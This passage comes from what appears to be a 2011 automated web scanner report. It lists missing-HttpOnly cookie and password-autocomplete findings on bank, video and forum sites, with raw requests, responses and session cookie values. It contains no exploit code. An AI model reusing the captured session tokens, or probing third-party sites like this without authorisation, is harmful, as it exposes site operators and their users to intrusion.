<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">

<head>
<title>Wells Fargo Online</ti
...[SNIP]...

11.747. https://www.wellsfargo.com/wfonline/bill_pay/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.wellsfargo.com
Path:   /wfonline/bill_pay/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /wfonline/bill_pay/ HTTP/1.1
Host: www.wellsfargo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WFHOME=PER; JSESSIONID=A063DC75E80493714CD441148D97EDA0; TCID=0007ae71-98bc-bd52-84ae-888500000049; wfacookie=B-201102021400581302177828; OB_SO_ORIGIN=source%3Dhomepage; NSC_XfmmtGbshp4=445b327f7863; v1st=EF949CC12A6233AB;

Response

HTTP/1.1 200 OK
Server: KONICHIWA/1.0
Date: Wed, 02 Feb 2011 22:29:32 GMT
Content-type: text/html; charset=UTF-8
Set-Cookie: wcmcookiewf=Hn32NJhMGlNPQpv5W4QlN8XHcN1XlnXBjNr1nj2CLZHRGdv7pWzW!349572437; domain=.wellsfargo.com; path=/; secure
Set-Cookie: ISD_WCM_COOKIE=2582928138.16927.0000; path=/
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xml:lang="en" lang="en">
<head><title>Wells Fargo Online - Bill Pay<
...[SNIP]...

11.748. http://www.youtube.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:17:42 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: VISITOR_INFO1_LIVE=5dLkeuUpIfY; path=/; domain=.youtube.com; expires=Sat, 01-Oct-2011 01:17:42 GMT
Set-Cookie: PREF=f1=40000000; path=/; domain=.youtube.com; expires=Sun, 31-Jan-2021 01:17:42 GMT
Set-Cookie: GEO=6f524a5d4479091d5f7b3cf435ef185ecwsAAAAzR0KtwdbzTUoCNg==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Connection: close

<!DOCTYPE html>
<html lang="en" dir="ltr" >
<!-- machid: nLThsU052OXJEdFdlVUxwdEZKT2d5N0ZVdk1pcWs2R3ljMzFYRmY0WHlVUnZId25ZWTFTYktR -->
<head>
<script>
var yt = yt || {};

yt.timing
...[SNIP]...

11.749. http://www.youtube.com/results  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /results

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /results?q=ipboard+software&um=1&ie=UTF-8&sa=N&hl=en&tab=w1 HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 303 See Other
Date: Thu, 03 Feb 2011 01:17:40 GMT
Server: wiseguy/0.6.7
Content-Length: 0
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: VISITOR_INFO1_LIVE=wZAocj4s5iU; path=/; domain=.youtube.com; expires=Sat, 01-Oct-2011 01:17:40 GMT
Set-Cookie: PREF=f1=50000000; path=/; domain=.youtube.com; expires=Sun, 31-Jan-2021 01:17:40 GMT
Set-Cookie: GEO=a3d95a7bd51bd648b14403d33e4e31fdcwsAAAAzVVOtwdbzTUoCNA==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Location: http://www.youtube.com/das_captcha?next=http%3A//www.youtube.com/results%3Fq%3Dipboard%2Bsoftware%26um%3D1%26ie%3DUTF-8%26sa%3DN%26hl%3Den%26tab%3Dw1
Connection: close


11.750. http://www.youtube.com/watch  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /watch

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /watch HTTP/1.1
Host: www.youtube.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 303 See Other
Date: Thu, 03 Feb 2011 01:17:43 GMT
Server: wiseguy/0.6.7
Content-Length: 0
X-Content-Type-Options: nosniff
Set-Cookie: use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; path=/; domain=.youtube.com
Set-Cookie: VISITOR_INFO1_LIVE=XJ-WTjH7UMA; path=/; domain=.youtube.com; expires=Sat, 01-Oct-2011 01:17:43 GMT
Set-Cookie: GEO=61c81e28805bccac540fef7fe21d6dafcwsAAAAzVVOtwdbzTUoCNw==; path=/; domain=.youtube.com
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Location: http://www.youtube.com/das_captcha?next=http%3A%2F%2Fwww.youtube.com%2Fwatch&ytsession=tPkJgKGgiVxR6VkyDxY0jMxu78qvhsjgoVr5s_OceJDQL_gh8WA3DK0wRe7SuQUcEQAF3en5aCBxUZe2i0H_Uofu5XRfNzNbj2jrlPvXTLDTPY8C_VQ_zsdHASZNpsQr-KXA7tSvZWfgU_4a1hlfLTkjpIknV7Cl1-2DLxGPithWt5ElD7hFmCXFR8gZVhBZOSKLuqeNRgqcMWiQeKdObub0ZNOc-1n1VomUbzwuBxm29IkoaDB3UA_wKtjbqiJ_amyjAQEZhbJaIA8HZAcU4ENpdzK6ncp3ZJ01PYBydW7KX5cIkc2Zvw
Connection: close


11.751. https://www2.bankofamerica.com/promos/jump/greatdeals/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www2.bankofamerica.com
Path:   /promos/jump/greatdeals/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /promos/jump/greatdeals/ HTTP/1.1
Host: www2.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:30:12 GMT
Content-type: magnus-internal/cold-fusion
Set-Cookie: SMIDENTITY=0UqbHxrdFB+IZK/yIQDzBx9SGv6BGzL7lzH4+m2m5Ag/SL9g3npRFfVI6KIEmu0/Hod7q4EuA6oQzDdS85o0coYHleZFid+LBGvSY5uZLDygIZeae1UW2VBI88kvQSWsFmOlVn5ZEmIo2pN8snUAFivEWp9gsATazmwhZjY9EzqSNnEBTOjkBSSYcTUyCwY3NSVzGO93DWb469Ts3G/FPGczX6tRnbWL6wLVjkb8afFGuYjisfHuVsWpgdMI5dnkNoJ77iZMPx7Ff3x7H4Um8dmvEOCfQ82H3QQmiLdgmuMYSmX2E4DMfhH+mVL8nqqXb1tWI4F55ChQZPtkyefbEs1rNkirDxvvGe2qQe33bFK1n6kE4VHyP8PFs6toDIGPr26lPotHq/TiTLqEm2Tm6b3uxs/3VLAjG9MoImDw/AfxTngVEJ7x9tafVeZOmteLNMr255a5XDiYVNFUeFQqVHqg8rSJii6JhV2ShUOawB6iMsk690ww5mVHKkPF1lMW; path=/; domain=.bankofamerica.com; secure
Location: http://www.bankofamerica.com/promos/jump/greatdeals2/?dbgredir=
Connection: close


12. Password field with autocomplete enabled  previous  next
There are 32 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


12.1. http://community.invisionpower.com/index.php  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /index.php

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /index.php?app=core&module=global&section=login HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:56:13 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=90a4f9618eeed4cbd7aef4daf30fa72a; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 22:56:13 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 31585

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   <html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.f
...[SNIP]...
</div>
       <form action="http://community.invisionpower.com/index.php?app=core&amp;module=global&amp;section=login&amp;do=process" method="post" id='login'>
       <input type='hidden' name='auth_key' value='880ea6a14ea49e853634fbdc5015a024' />
...[SNIP]...
</label>
                       <input id='password' type='password' class='input_text' name='password' size='25' /><br />
...[SNIP]...

12.2. http://community.invisionpower.com/resources/documentation/index.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /resources/documentation/index.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /resources/documentation/index.html HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=757045b851650fbe10c53dad4062548d; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:56:11 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=16bbd6a3efa6f42a30f8d5c0d22a2d10; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Tue, 01 Feb 2011 22:56:12 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 32760

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
<div id='member_block' class='logged_out'>
   
       <form action='http://community.invisionpower.com/index.php?app=core&module=global&section=login&do=process' method='post'>
           <input type='hidden' name='return' value='http://community.invisionpower.com/resources/documentation/index.html' />
...[SNIP]...
<input type="text" class='input_text' size="20" name="username" id='welcome-username' onfocus="clearField('welcome-username');" value="Username or email" />
           <input type='password' class='input_text' size='20' name='password' id='welcome-password' onfocus="clearField('welcome-password');" value='Username or email' />
           <input type='submit' class='input_submit' value='Sign In' />
...[SNIP]...

12.3. http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/installation-r17  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /resources/documentation/index.html/_/documentation/getting-started/installation-r17

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /resources/documentation/index.html/_/documentation/getting-started/installation-r17 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:08:26 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=26a6b17494dde8cfa26a90ef195a3c6d; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 00:08:27 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; expires=Fri, 03-Feb-2012 00:08:27 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_itemMarking_ccs_items=eJxLtDK0qs60MjS3BhJGlmZmlobmBmbWtVwwUA4GMg%2C%2C; expires=Fri, 03-Feb-2012 00:08:27 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 34380

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
<div id='member_block' class='logged_out'>
   
       <form action='http://community.invisionpower.com/index.php?app=core&module=global&section=login&do=process' method='post'>
           <input type='hidden' name='return' value='http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/installation-r17' />
...[SNIP]...
<input type="text" class='input_text' size="20" name="username" id='welcome-username' onfocus="clearField('welcome-username');" value="Username or email" />
           <input type='password' class='input_text' size='20' name='password' id='welcome-password' onfocus="clearField('welcome-password');" value='Username or email' />
           <input type='submit' class='input_submit' value='Sign In' />
...[SNIP]...

12.4. http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/ipnexus-getting-started-guide-r514  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /resources/documentation/index.html/_/documentation/getting-started/ipnexus-getting-started-guide-r514

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /resources/documentation/index.html/_/documentation/getting-started/ipnexus-getting-started-guide-r514 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:08:31 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=23b36da2676ec4b7a7eada851882031e; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 00:08:33 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; expires=Fri, 03-Feb-2012 00:08:33 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_itemMarking_ccs_items=eJxLtDK0qs60MjU0sc60MjSyNDOzNDQ3NLauBVwwVbgGYg%2C%2C; expires=Fri, 03-Feb-2012 00:08:33 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 33618

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
<div id='member_block' class='logged_out'>
   
       <form action='http://community.invisionpower.com/index.php?app=core&module=global&section=login&do=process' method='post'>
           <input type='hidden' name='return' value='http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/ipnexus-getting-started-guide-r514' />
...[SNIP]...
<input type="text" class='input_text' size="20" name="username" id='welcome-username' onfocus="clearField('welcome-username');" value="Username or email" />
           <input type='password' class='input_text' size='20' name='password' id='welcome-password' onfocus="clearField('welcome-password');" value='Username or email' />
           <input type='submit' class='input_submit' value='Sign In' />
...[SNIP]...

12.5. http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/upgrading-r18  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /resources/documentation/index.html/_/documentation/getting-started/upgrading-r18

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /resources/documentation/index.html/_/documentation/getting-started/upgrading-r18 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:08:26 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=52c21975d801317348f94128ddfa4737; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 00:08:27 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; expires=Fri, 03-Feb-2012 00:08:27 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_itemMarking_ccs_items=eJxLtDK0qs60MrSwBhJGlmZmlobmBubWtVwwUCEGNA%2C%2C; expires=Fri, 03-Feb-2012 00:08:27 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 33840

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
<div id='member_block' class='logged_out'>
   
       <form action='http://community.invisionpower.com/index.php?app=core&module=global&section=login&do=process' method='post'>
           <input type='hidden' name='return' value='http://community.invisionpower.com/resources/documentation/index.html/_/documentation/getting-started/upgrading-r18' />
...[SNIP]...
<input type="text" class='input_text' size="20" name="username" id='welcome-username' onfocus="clearField('welcome-username');" value="Username or email" />
           <input type='password' class='input_text' size='20' name='password' id='welcome-password' onfocus="clearField('welcome-password');" value='Username or email' />
           <input type='submit' class='input_submit' value='Sign In' />
...[SNIP]...

12.6. http://community.invisionpower.com/resources/documentation/index.html/_/knowledge-base/recurring-non-version-specific-issues/encoded-files-with-zend-guard-r536  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://community.invisionpower.com
Path:   /resources/documentation/index.html/_/knowledge-base/recurring-non-version-specific-issues/encoded-files-with-zend-guard-r536

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /resources/documentation/index.html/_/knowledge-base/recurring-non-version-specific-issues/encoded-files-with-zend-guard-r536 HTTP/1.1
Host: community.invisionpower.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: cforums_session_id=8d464692f5305d92adc7b346c33d132b; cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; cforums_modpids=deleted; __utmz=161164207.1296685568.1.1.utmcsr=invisionpower.com|utmccn=(referral)|utmcmd=referral|utmcct=/products/board/; __utma=161164207.2019448737.1296685568.1296685568.1296685568.1; __utmc=161164207; __utmb=161164207.1.10.1296685568;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 00:08:25 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: cforums_session_id=7e18e83c9fce99cef40adc0b7151471b; path=/; domain=community.invisionpower.com; httponly
Cache-Control: no-cache,must-revalidate, max-age=0
Expires: Wed, 02 Feb 2011 00:08:26 GMT
Pragma: no-cache
Set-Cookie: cforums_itemMarking_forums_items=eJxLtDK0qs60MjY2sDQ3tM60MjSyNDOzMDU1NrGuBVwwaHIHAw%2C%2C; expires=Fri, 03-Feb-2012 00:08:26 GMT; path=/; domain=community.invisionpower.com
Set-Cookie: cforums_itemMarking_ccs_items=eJxLtDK0qs60MjU2s860MjSyNDOzNDQ3MLOuBVwwVf8GaA%2C%2C; expires=Fri, 03-Feb-2012 00:08:26 GMT; path=/; domain=community.invisionpower.com
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 30617

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
<div id='member_block' class='logged_out'>
   
       <form action='http://community.invisionpower.com/index.php?app=core&module=global&section=login&do=process' method='post'>
           <input type='hidden' name='return' value='http://community.invisionpower.com/resources/documentation/index.html/_/knowledge-base/recurring-non-version-specific-issues/encoded-files-with-zend-guard
...[SNIP]...
<input type="text" class='input_text' size="20" name="username" id='welcome-username' onfocus="clearField('welcome-username');" value="Username or email" />
           <input type='password' class='input_text' size='20' name='password' id='welcome-password' onfocus="clearField('welcome-password');" value='Username or email' />
           <input type='submit' class='input_submit' value='Sign In' />
...[SNIP]...

12.7. http://fis.com/fis/worldnews/worldnews.asp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://fis.com
Path:   /fis/worldnews/worldnews.asp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /fis/worldnews/worldnews.asp?monthyear=&day=25&id=40221&l=s&special=&ndb=1%20target= HTTP/1.1
Host: fis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 03 Feb 2011 00:54:38 GMT
Connection: close
Content-Length: 85564
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCASTCAST=BLGBFPGBOBOPPDLCDHNLOLLM; path=/
Cache-control: private


<html>
<head>
   <meta http-equiv="content-type" content="text/html; charset=UTF-8">
   <meta http-equiv="refresh" content="1800">
   <title>FIS - Noticias - Clean Seas recorta sus p..rdidas financier
...[SNIP]...
<!-- LOGIN -->
   <form name="member_login">
       
           <tr>
...[SNIP]...
<td>
                                           <input style="font-size: 9px; font-family: verdana; height: 15px" onFocus="this.select()" type="password" size="8" name="password" onkeyPress="checkEnter(event)">
                                       </td>
...[SNIP]...

12.8. http://fis.com/fis/worldnews/worldnews.asp  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://fis.com
Path:   /fis/worldnews/worldnews.asp

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /fis/worldnews/worldnews.asp HTTP/1.1
Host: fis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 03 Feb 2011 00:54:33 GMT
Connection: close
Content-Length: 83533
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCASTCAST=LKGBFPGBNACCBLIDDPHBHANM; path=/
Cache-control: private


<html>
<head>
   <meta http-equiv="content-type" content="text/html; charset=UTF-8">
   <meta http-equiv="refresh" content="1800">
   <title>FIS - Worldnews - Icelandic Group still up for grabs</title
...[SNIP]...
<!-- LOGIN -->
   <form name="member_login">
       
           <tr>
...[SNIP]...
<td>
                                           <input style="font-size: 9px; font-family: verdana; height: 15px" onFocus="this.select()" type="password" size="8" name="password" onkeyPress="checkEnter(event)">
                                       </td>
...[SNIP]...

12.9. http://insidejapantours.com/japan-news/1671/tuna-costs-254-000-in-japan/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://insidejapantours.com
Path:   /japan-news/1671/tuna-costs-254-000-in-japan/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /japan-news/1671/tuna-costs-254-000-in-japan/ HTTP/1.1
Host: insidejapantours.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: CSPSESSIONID-SP-80=00000001000039bv9MU3000000HVqGoe$mkIhY9X0_5aueuw--; path=/;
CACHE-CONTROL: no-cache
CONNECTION: Close
DATE: Thu, 03 Feb 2011 01:02:54 GMT
EXPIRES: Thu, 29 Oct 1998 17:04:19 GMT
PRAGMA: no-cache

<!DOCTYPE html PUBLIC "-//W3C//DTD Xhtml 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<link rel="alternate" type="application/rss+xml" title="Japan
...[SNIP]...
<div class="pad5"><form method="post" action="/csp/jap/insidejapan/loginok.csp">


<input type="hidden" name="FormPage" value="login">
...[SNIP]...
<td><input class="smalltxt" name="password" type="password" size="10"></td>
...[SNIP]...

12.10. http://ipboard-software.software.informer.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ipboard-software.software.informer.com
Path:   /

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET / HTTP/1.1
Host: ipboard-software.software.informer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Thu, 03 Feb 2011 01:02:55 GMT
